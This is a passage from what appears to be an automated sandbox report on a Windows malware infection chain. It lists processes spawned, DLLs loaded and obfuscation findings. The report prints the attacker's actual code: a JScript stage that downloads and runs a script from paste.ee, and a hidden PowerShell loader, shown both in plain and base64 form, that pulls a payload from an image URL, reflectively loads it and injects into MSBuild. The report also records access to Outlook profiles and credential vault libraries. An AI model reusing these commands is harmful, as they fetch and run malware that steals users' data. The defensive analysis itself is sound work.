QBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: Binary string: choice.pdbGCTL source: MSBuild.exe, 00000009.00000002.2190330071.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: wscript.exe, 00000000.00000002.2396088723.000000001F1AC000.00000004.80000000.00040000.00000000.sdmp, choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951908550.000000000500C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2492779441.000000001BA1C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000003.2186865079.000000000482E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000003.2185050741.0000000004679000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000009.00000002.2194797530.0000000001360000.00000040.00001000.00020000.00000000.sdmp, choice.exe, choice.exe, 0000000A.00000003.2186865079.000000000482E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000002.2951593841.0000000004B7E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 0000000A.00000003.2185050741.0000000004679000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: choice.pdb source: MSBuild.exe, 00000009.00000002.2190330071.0000000000E38000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  JScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("cscript C:\Users\user\AppData\Local\Temp\ostaxa.js", "0", "true");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/69SP6", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ostaxa.js", "2");IWshShell3.Run("cscript C:\Users\user\AppData\Local\Temp\ostaxa.js", "0", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\ostaxa.js");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\ostaxa.js")
                  Source: C:\Windows\System32\cscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAg", "0", "true")
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG